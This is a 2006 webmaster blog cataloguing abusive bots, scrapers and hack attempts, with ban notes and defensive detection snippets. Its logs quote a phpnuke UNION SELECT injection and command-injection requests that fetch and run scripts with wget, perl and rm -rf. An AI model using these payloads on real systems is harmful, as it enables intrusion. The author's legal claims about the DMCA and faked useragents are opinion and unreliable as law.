Sep 29, 2006

Web Scrapers Violate the Digital Millennium Copyright Act

The Digital Millennium Copyright Act makes it a crime to create software
that allows a user to get around any copy protection used to stop
theft of copyrighted content.

Companies that create bots that fake useragents to get around our blocks
violate the DMCA.

We need a class action lawsuit against the software authors who create Web Scrapers.

abuse unknown bot

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]

Robot fakes useragents.
Loads the robots.txt file and then loads files it is told not to.
Has fallen into the bot trap several times.
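
One way to confirm that a robot read the robots.txt file and then loaded files it was told not to is to replay its requests against the rules. This is only a rough sketch in Python using the standard library's robots parser. The robots.txt content and the /bot-trap/ path are made up for illustration and are not the real trap on this site.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt with a trap directory that no polite robot should enter.
ROBOTS_TXT = """\
User-agent: *
Disallow: /bot-trap/
"""


def disallowed_hits(robots_txt, requests):
    """Return the (agent, path) pairs that robots.txt told the robot not to load."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return [(agent, path) for agent, path in requests
            if not parser.can_fetch(agent, path)]
```

Any pair this returns is a request the robot was asked not to make, which is what the bot trap relies on.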

This bot holds this IP and is hosted on

added to domain ban,Unknown Canada bot kostanay spam

ThePlanet offers internet access to businesses, so we have to be careful about banning that domain.

Verified robots list that need to be banned

Update: I am fed up with this bot. It is trying to place orders on my store using only a name and city, and it is copying all the keys off the pages.
name : alex
city : kostanay

So everything from is now banned.

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1) abuse


Resolve Ltd. is a Russian hosting company which appears to be involved in fraud schemes. A search on the IP address returns a lot of spammed guestbooks, mostly for pills. Apparently the spammer specialises in targeting the Advanced Guestbook script. The bot is using both random user agents and proxy servers, and the referrer pointed to the domain

This robot was caught scanning with no agent, which is automatically blocked. To prevent entry by any of its other fake agents the domain needs to be added to the domain block list.,guestbook spam and Fraud

Sep 27, 2006

Just what is

We receive a lot of abuse from this domain and a lot of webmasters are blocking it.
But since the domain has no website it was not clear what it was.
After a long search I have discovered that it's British Telecom DSL.
See DSL report page. This was the only site that told what it was.

Why the lame techs at BT don't have a website at that domain is confusing, because not knowing what it is is getting BT customers globally banned. This domain should not be banned, as it is an ISP.
It is not clear yet if DSL modems keep the same IP, so we have to ban by IP until we know.

To the folks at BT Please put a website at

Sep 25, 2006

necbot/1.0 (nec labs america)

necbot/1.0 (nec labs america)
All Hits From

I can find no info on this bot.

The IP is registered to NEC, but it's confusing as to why NEC has a bot. This might be banned later as we are not sure what it is.

OrgName: NEC Laboratories America, Inc.
OrgID: NLA-29
Address: 4 Independence Way
Address: Suite 200
City: Princeton
StateProv: NJ
PostalCode: 08540
Country: US

bad bot

First the bot falls into a bot trap it found from reading the robots.txt file.
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

Just to make sure, it hits the bot trap again with another useragent
mozilla/4.0 (compatible; msie 5.0; windows xp) opera 6.05 [en]

Then it tries to scan the site. Note how its user agent changes as it scans.

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

This one gets stopped by BB for improper headers
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

Stopped by BB
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

It just keeps hammering like this but never gets in.
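
The pattern above, one IP switching between useragents from one request to the next, is easy to spot in a log. Here is a minimal sketch in Python. The (ip, agent) log format and the address 192.0.2.10 are assumptions for illustration only. Note that several real users behind one proxy can also share an IP, so this is a hint and not proof.

```python
from collections import defaultdict


def rotating_agents(log_entries, max_agents=1):
    """Map each IP to its useragents when it used more than max_agents of them."""
    seen = defaultdict(set)
    for ip, agent in log_entries:
        # Compare case-insensitively, since the same agent shows up in both cases.
        seen[ip].add(agent.strip().lower())
    return {ip: sorted(agents)
            for ip, agents in seen.items()
            if len(agents) > max_agents}
```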

So what is this bot doing?

Sep 24, 2006

baiduspider bad bot ignores robots.txt


This is a Chinese search system that indexes sites written in Chinese, I think.
Since my sites are in English I don't understand why it's trying to index me.

It says to add "baiduspider" to your robots file. I did this months ago but it's back.
It is ignoring the robots.txt file.

The above IPs are in the blacklist as spammers. See link. You have to click on OPEN RBL and then, when the second window opens, click on LOOKUP. This will display all the block lists in red.

It has been added to the useragent ban list and is blocked, but it just ignores the
error and keeps coming back. It's time to add the IPs to the Server IP ban.

deny from
deny from
deny from
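
When there are a lot of IPs to add, the deny lines can be generated from a list instead of typed by hand. This is a small sketch in Python. The addresses in the usage note are reserved documentation addresses, not the real IPs of this bot, and the function name is made up.

```python
import ipaddress


def deny_lines(addresses):
    """Build 'deny from' lines for single IPs or CIDR ranges."""
    lines = []
    for address in addresses:
        # ip_network raises ValueError on anything that is not a valid IP or range.
        network = ipaddress.ip_network(address, strict=False)
        if network.num_addresses == 1:
            lines.append(f"deny from {network.network_address}")
        else:
            lines.append(f"deny from {network}")
    return lines
```

For example, deny_lines(["192.0.2.7", "198.51.100.0/24"]) gives one line for the single address and one for the whole range.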

More work needed to find all its IPs.

BOT


What is this Mozilla 7 that's invalid? Some kind of bot. The website has what looks like a guestbook on its front page.

It hit 2 of my domains and was stopped by BB as invalid.

compatible; MSIE 6; Win32; Mck IS it a new bot?

User-Agent claimed to be MSIE- with invalid Windows version

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)

What is this useragent? It first looks ok stating
compatible; MSIE 6.0; Windows NT 5.1;
But then it has a second part which looks like the useragent is starting over.
Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)
Inside this strange string is another browser version.
compatible; MSIE 6; Win32; Mck

What is MSIE 6? This is invalid.
What is Win32? This is also an invalid version.
What is Mck?
Why is Mozilla/4.0 repeated?

If this is not some strange proxy then this is a new bot.
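
The two oddities picked out above, the repeated Mozilla/4.0 and the MSIE version with no minor number, can be checked mechanically. This is a minimal sketch in Python and not how Bad Behavior does it. It assumes that real MSIE agents of this era always carry a minor version such as "MSIE 6.0" or "MSIE 5.01".

```python
import re

# "msie 6" with no ".0" after it; "msie 6.0" and "msie 5.01" do not match.
MSIE_WITHOUT_MINOR = re.compile(r"msie \d+(?![\d.])")


def useragent_problems(agent):
    """Return a list of reasons why this useragent string looks malformed."""
    problems = []
    lowered = agent.lower()
    if lowered.count("mozilla/") > 1:
        problems.append("Mozilla token repeated")
    if MSIE_WITHOUT_MINOR.search(lowered):
        problems.append("MSIE version without minor number")
    return problems
```

An empty list only means these two checks passed, not that the agent is genuine.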

This is banned by BB as an invalid Windows version.

harvester

This bot is a spammer's dream. It is creating a database of all websites:
NAME, ADDRESS, PHONE# & EMAIL ADDRESS. Once finished it will have a search option to look up the data.

This is why you should not post your name, address and phone# on your website. Give this data only to customers who place orders, or require a customer to have an account before it's displayed. New customers only need a contact form.

It claims it will not display anyone not in a "Trade Register". I don't know what that is, but if it's true, why are they scanning non-business websites?

Read the translation of what they are doing here.

Email/Contact info Harvester.

Sep 20, 2006

abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
83 hits From

The above is one of the suspected useragents that always turns out to be a robot and not a browser. A search of Google shows a lot of abuse from this domain, so it's banned.

domain ban list,pro spam host

Sep 19, 2006

LWP::Simple/5.48 FastCounter Robot using LWP


The bcentral FastCounter sends out a robot to check your link and verify your site. However, this robot doesn't have its own useragent. It uses "LWP::Simple/5.48", which is banned by most everyone as a spambot.

Attempts to report this failed because both the chat and email contact forms do not work on the site. I also just discovered that FastCounter free is no longer free unless you had already created your counters before 2005. I have about 15 such counters, so mine are still working.

If you have trouble with your counters not working you will have to add the above ip to the whitelist.

Just what is blogslive - Admitted Data-Miner

blogslive (

Blogslive will visit your blog the same day you create it.
The domain is just a GoDaddy parked web page; no such site exists.
The website also does not exist; it redirects to

To quote this website.
With solid data-mining technology, superb research and Nielsen’s unrivaled experience in media measurement and client services, we help today’s companies, brands and business professionals better understand the influence and impact of CGM on products, issues, reputation and image.

So blogslive is what I suspected all along: it's a fake robot used to data-mine your website so they can sell your content to others. Can you say copyright violation?

Banned Banned Banned....................

fakes google

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)

This IP was caught faking the Google proxy, which is banned anyway because it's a proxy.

Sep 17, 2006

dragonfly bot

dragonfly( redirects to enmax, which has something to do with utilities. I can't tell what they are, but they are not an ISP and should not be running a robot.

Both the domain and useragent should be banned.,Email harvestor spam tool

isc systems irc search 2.1

Caught this spam harvester running on a domain that has no website.

Add to domain ban,Spam Email Harvestor SpamBot

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

This is an MLM company. I could not find any tracks in Google, so it must be a new spambot they have started up this week.

This domain should be added to the ban list.

I do see a court settlement on pyramid marketing here

Domain ban,MLM co running Unknown Bot

Sep 13, 2006

abuse

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Yes the above useragent is one of the known spam tools.
This domain has a page saying they will be back up soon, while a Google search of the domain shows postings on adult webmaster forums.

This domain is banned for using spam tools.,Caught using spam tools

Sep 12, 2006

trishuli.cs.UMBC.EDU spambot

Java/1.5.0_02 trishuli.cs.UMBC.EDU

This is known spam software used to harvest email addresses.
It is running in the Computer Science Dept of the University of Maryland, Baltimore County (UMBC).

This has been reported.

bot

From Germany has no agent.

It's not clear what this bot is trying to do. It's always on the same IP and only hits the top page.

Guestbook Spammer

ADD Spam robot Trap
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)

After doing a search I see that this domain often turns up on guestbooks posting spam so this domain is now added to the domain block.,Guestbook Spammer

IRLbot/2.0 bot banned

Request : /contact.html
IP :
Agent : IRLbot/2.0 (compatible; MSIE 6.0;

This bot didn't make it into the site. It went straight to an old contact form that had been removed due to spam and hit it 7 times.

This bot was banned long ago for being a waste of bandwidth: it only takes our bandwidth and gives nothing back.

To quote the website.
"Texas A&M research project sponsored in part by the National Science Foundation that investigates algorithms for mapping the topology of the Internet and discovering the various parts of the web."
That's great and all, but Texas A&M needs to use its own bandwidth for this project and not ours.

Mozilla/5.0 Agent by itself

Agent: Mozilla/5.0
Agent: Mozilla/5.0
Agent: Mozilla/5.0

As you can see, the same bot hit from 3 places one after another.

I have seen this before being used by hackers. It is clearly some type of hack tool or script.

To prevent false alarms this cannot be added to the useragent ban list, because a partial match would also catch real browsers whose agents begin with Mozilla/5.0. It must be hard coded in as an exact match, which will be done in the next release of MMAUTOBAN, v3.3.
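
The difference between an exact match and a partial match is easy to show. This is only a sketch in Python to illustrate the idea; it is not the MMAUTOBAN code, and the names are made up.

```python
# Agents banned only when the whole string matches, never as a substring.
EXACT_BANNED_AGENTS = {"mozilla/5.0"}


def is_banned_exact(agent):
    """True only when the entire useragent equals a banned entry."""
    return agent.strip().lower() in EXACT_BANNED_AGENTS


def is_banned_partial(agent):
    """Substring match, shown only to demonstrate the false alarm it causes."""
    lowered = agent.lower()
    return any(banned in lowered for banned in EXACT_BANNED_AGENTS)
```

The bare agent "Mozilla/5.0" is caught by both checks, but a real browser such as "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040218 Galeon/1.3.12" is caught only by the partial one.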

Sep 11, 2006

sproose/0.1 (the Sproose Goose bot)

Agent: sproose/0.1 (sproose bot;;
from Ips
Most likely others but we are not keeping track.


The Sproose Goose is banned because it's a startup with no content. Scrapers often use the fake startup scam to get past blocks. Unless the Sproose Goose actually does fly, they will stay banned. Right now we do not know if this is a real company or a scraper.

The robot was caught following links it should not be able to see because it's banned. The only way it could be doing this is by following Google listings back to our site.

Added to UA Start file
sproose/0.1,Fake Startup co

Sep 9, 2006

Hacker

ADD ALARM: */select/* injection
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0-0-pwd-0-aid/**/FROM/**/nuke_authors GET HTTP/1.1
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; simbar enabled; simbar={ff31d371-c0bf-4f98-ac32-ccaee7d5f828})

The above attempted union injection hack of the phpnuke database was detected and the IP autobanned by M&M Autoban.
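
Notice that the hacker uses /**/ comments in place of spaces, so a plain search for "union select" would miss it. Here is a rough sketch in Python of one way to catch it: decode the URL, strip the SQL comments, then look for the keywords. This is an illustration only and not the actual check inside M&M Autoban.

```python
import re
from urllib.parse import unquote

SQL_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b", re.IGNORECASE)


def looks_like_union_injection(request_line):
    """True when the decoded request contains UNION SELECT, even split by comments."""
    decoded = unquote(request_line)
    # Replace each /* ... */ comment with a space so the keywords line up.
    without_comments = SQL_COMMENT.sub(" ", decoded)
    return bool(UNION_SELECT.search(without_comments))
```

A search for "student union" passes, because the word select has to follow right after.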

One wonders why I am seeing a lot of hackers with simbar enabled in the user agent.
None of my regular visitors have simbar.

Sep 7, 2006

spoofed?

Blacklist Domain Ban: Entire range spoofed by hackers
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; wow64; sv1)

Word is that someone is using Microsoft IPs.

One would think MS would be using MSIE 7 if it was real.

Update: I started seeing what looked like valid users, so this domain was removed from the ban list but is being watched.

Bad Behavior Whitelist adjustment

Bad Behavior has some problems with known good bots. You need to adjust your whitelist to let them in.

Edit whitelist.php and change $bb2_whitelist_ip_ranges to:

$bb2_whitelist_ip_ranges = array(
// Looksmart
// Scooter/3.3
// YahooSeeker/1.2
// FreeFindRobot Good bot with some header problems
// banner tester

These are known bots that BB blocks due to header problems. Without this change AltaVista Scooter will not be able to index your site. has been added because the new robot they use is blocked as a spambot.

abuse

bad-behavior 400 Required header 'Accept' Missing.
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
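
The block above happened because the request had no Accept header, which a real browser sends with every request. A check of that kind can be sketched in a few lines of Python. This is an illustration only, not the Bad Behavior code, and the function name is made up.

```python
def missing_required_headers(headers, required=("accept",)):
    """Return the required header names that the request did not send."""
    # Header names are case-insensitive, so compare in lower case.
    present = {name.lower() for name in headers}
    return [name for name in required if name not in present]
```

A request that returns anything other than an empty list would get the 400.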

Thought to be a scraper. See other info here

Reports now say that this is content filtering.
If it is, it's the worst bot ever written, because it fakes its useragent and sends illegal headers. Clearly not the tech leader it says on the website.

Writing to lightspeed and waiting for a reply.

Update: They refuse to reply to my emails, so it's banned. I don't care what they say it is. It is abuse because they are faking the useragents, are using improper headers, and do not identify themselves in the scan.

added domain ban,Wont reply to emails abuse

Also banned by all blogs using Bad Behavior

Sep 6, 2006

Java/1.5.0



Valueclick and are the same company. It is unclear why they are using this useragent. This useragent is blocked as a known spam tool; they should not be using it.

This has been reported to valueclick and

After 1 month CJ sent this reply to the problem of a broken useragent string.

For further details, regarding our Network Insight Spider, please access the following URL:

Well....... Hummm what am I to say to that answer?

And people wonder why customer service people have a bad rep.

What to do.
This looks like a legit bot that needs to be let in; however, CJ would not say whether it was the real CJ bot or not.
The IP needs to be added to the whitelist in BB and M&M Autoban; however, I have not seen it this month so it may be fixed. Will have to wait and see.

But anyway, there is no point in writing to them again. All they gave me after 1 month was the URL that's in the normal useragent string.

How to protect your site

Protect your website in realtime.
As seen on PC Magazine

Protect your PHP site and scripts from bad abusive robots that use up your bandwidth.

Have you checked your logs only to find you have more robots or unknown users than you have real visitors?

Examples of what is visiting your site
Robots watching to see if your domain expires
Robots from some startup search engine no one will ever use
Robots from search engines in languages you don't serve
Robots from companies trying to see if you violated some copyright
Robots from some government website monitoring for some unknown content
Robots trying to collect email addresses
Robots trying to hack into your site
Robots pinging your scripts in an attempt to get your software to list where they came from
Robots probing for scripts called modules.php posting.php submit.php and others
Robots using random agents to avoid blocking.
Hackers trying to use union injections on your database

Copyright owners have the legal right under the DMCA to reserve the right to view content only to website visitors. Webmasters have the legal right under the DMCA to block access to anyone who wants to store or copy website content. It is also a crime under US law to use any trick or false information to gain access to a computer system. Running a robot that pretends to be a user by faking its useragent is a crime under US law because it is using false information to gain access to a computer system.

M&M Autoban can be used as a Bot-Trap to autoban every ip that hits a trap listed in your robots file. It is included in all of your php scripts to check the user against the ip ban list and then verify that the visitor qualifies to visit your website.
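
The order of the checks described above (ban list first, then the trap) can be shown with a small sketch. It is written in Python just to illustrate the flow; M&M Autoban itself is PHP, and this is not its code. The class name, the /bot-trap/ path, and keeping the ban list in memory are all assumptions for the example.

```python
class BotTrap:
    """Ban any IP that requests a trap path, and refuse banned IPs everywhere."""

    def __init__(self, trap_paths, banned_ips=None):
        self.trap_paths = tuple(trap_paths)
        self.banned_ips = set(banned_ips or ())

    def allow(self, ip, path):
        # Check the ban list first so a banned IP costs as little as possible.
        if ip in self.banned_ips:
            return False
        # A hit on a trap path listed in robots.txt bans the IP from now on.
        if path.startswith(self.trap_paths):
            self.banned_ips.add(ip)
            return False
        return True
```

Once an IP has hit the trap, every later request from it is refused, no matter which useragent it sends next.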

You cannot just send spam bots into an endless fake email loop unless you have unlimited bandwidth and you don't care about a slow server. And it doesn't hurt them anyway. A spam bot must be terminated ASAP with as little bandwidth being used as possible.

Works with Bad Behavior but BB is not required.

Works on all PHP scripts needs no database!
Prevents Union Injections and known hacks.
Tracks agents
Set blocking list anyway you like

Now works With Wordpress.

Click on downloads to the right.

abuse Corp. Snooper

Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040218 Galeon/1.3.12
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)

All of the above were blocked by bad-behavior as having defective headers.
Only 1 old win95 bot gets past BB, but it is blocked by our domain ban.
mozilla/4.7 [en] (win95; u)
mozilla/4.7 [en] (win95; u)

This has now all been tracked back to a service called "Brand Audit and Patrol". It visits our sites to see if we are saying bad things about brand names and to check if we have brand logos.

The problem is that they are using a defective robot that is blocked by all blogs that use Bad Behavior. It's likely that this patrol bot cannot even see 60% of all the blogs it's trying to scan due to poor programming.

Also, this robot fakes useragents to gain access to websites in violation of US federal law, which makes it a crime to use false information or any trick to gain access to a computer system.

This domain is banned for wasting bandwidth and using false information and tricks to gain access to website content.,brand audit patrol

Funny
Blacklist Domain Ban: GoDaddy web hosting -
Unknown bots

Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr

Domain: doesn't have a website; it redirects to which is GoDaddy's
payment service.

How does someone run Windows on a GoDaddy server? They don't. It's a bot,
and it's scanning for info on who is blocking bots. Funny. What does this
tell you?

We were banning just part of this domain but now suggest banning the
entire thing.,GoDaddy web hosting - Unknown bots

Panscient Data Services

Originally the bot was detected scanning the site using a fake useragent. This was reported to who sent back a canned reply that this was a nice bot and followed the robots file.

My original request for info on who ran the bot and why it was faking the useragent of a browser was ignored.

I replied back to abuse and asked if owned this bot and why it was using a fake useragent if it was a nice bot. But my questions were ignored and all I got back was the same canned reply. knows about this bot, allows it to operate, hides the identity of its owner and ignores complaints about it.

This bot was built by it is unclear if they own it.

At Panscient Technologies we design, build and operate custom internet search engines that unlock the hidden structure of web data.
Using state of the art AI technology, Panscient Technologies' software analyzes web sites for their information content and compiles the data into a searchable index.

Yeah right, state of the art scraping.

At this time it is unclear who else uses this bot because it's stealth.

Add to domain ban list,Abuse

or to the ip ban on your server

Singapore


This domain redirects to which is a proxy. Since the URL being attempted was one that spammers hit, I suspect they were trying to get by my blocks. I don't know why the spam never gets posted even when they get past the block. Lamers....

I tested this proxy by taking it to the bot trap and got this. It passed my useragent.

I cannot tell where they got the from. It did not come from that proxy, so they must be running more than one. Both need to be banned.

See post on guestbook spammer running on

Domain Ban.,Singapore proxy,Singapore proxy

Union Injection hackers

Ever since I posted on my new anti union injection module, hackers have been trying to hack my forums. Someone tell me something. Perhaps I don't understand this, but why would a hacker show me just how he hacks a site so I can take that info and adjust my script to block such hacks?

All his attempts were blocked, even by my alpha script.

modules.php?basepath=;wget%20;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? GET HTTP/1.0
Agent: mozilla/5.0

modules.php?basepath=;wget%20;perl%20mambo1.txt;rm%20-rf%20mambo1.*? GET HTTP/1.0
Agent: mozilla/5.0

modules.php?basepath=;wget%20;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0

modules.php?basepath=;wget%20;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0

is banned
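
All of these requests have the same shape: a semicolon in the query string followed by a shell command (wget, perl, rm). Here is a minimal sketch in Python of a check for that pattern. The command list comes only from the log lines above, and this is an illustration, not the code in my script.

```python
import re
from urllib.parse import unquote

# A semicolon followed by one of the shell commands seen in the log above.
SHELL_COMMAND = re.compile(r";\s*(wget|perl|rm)\b", re.IGNORECASE)


def looks_like_command_injection(request_line):
    """True when the decoded request chains a shell command after a semicolon."""
    return bool(SHELL_COMMAND.search(unquote(request_line)))
```

A normal request such as modules.php?name=News has no semicolon followed by a command, so it passes.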

Here is part of his IRC script code.
my $linas_max='4';
my $sleep='5';
my @adms=("xxxxx","ok","mos","KKTeam");
my @canais=("#phpnuke");
my $nick='shutup';
my $ircname ='Stop';
chop (my $realname = 'uname -rs');
$servidor='' unless $servidor;
my $porta='8200';

link checker

This bot looks like it's using a link checker downloaded from

I think this is a scraper. Whatever it is pretending to be has no website, so it's suspect right out of the box.

It's banned by agent and domain.

/ answerbus bot

This bot first came in using an agent for a text browser. Clearly fake.

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a

After a week they changed user agents to.

answerbus (

Now they are back to using a fake text browser agent. Perhaps its 2 bots.
lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a

It often came in with referrers that tracked back to its scraper site.

All of these websites have the same thing on them. It looks like a search system and even says "supported by research grants from .....". I don't know if that's true. If it is, they should ask for the money back. Unless they support scrapers?

I tested this search system using the keywords for my sites, and what I found were listings with my text and site name that looked like they were links to my site, but when clicking on them I was taken to other scraper linking sites.

This thing is banned by domain and user agent.

Update bot getting very active suggest adding to server ip ban

deny from
deny from
deny from
deny from


blogsearchbot-pumpkin-2 GET HTTP/1.0

I don't know what pumpkin is but its banned.

They say it doesn't read robots. I don't care; with no idea what it is, it's banned.

Sep 5, 2006

abuse

wells search ii
wells search ii
wells search ii

Have been seeing a lot of this spam harvester running on

Also turned up at

This is a known spam harvester.

SuperCleaner 2.84

What is useragent
Mozilla/4.0 (compatible; SuperCleaner 2.84; Windows NT 5.1)

SuperCleaner 2.84 is a disk cleaner so why is it trying to visit my site?

Bad Behavior is blocking it due to incorrect format.

Unless I can find out what SuperCleaner 2.84 is it will be added to the block list.


Welcome to the new Blog. I had to move from the forum over to here because of all the attempts to hack the forum software.

All the old posts from the forum had to be purged so I could get them out of the Google index.

I will attempt to repost the major ones here.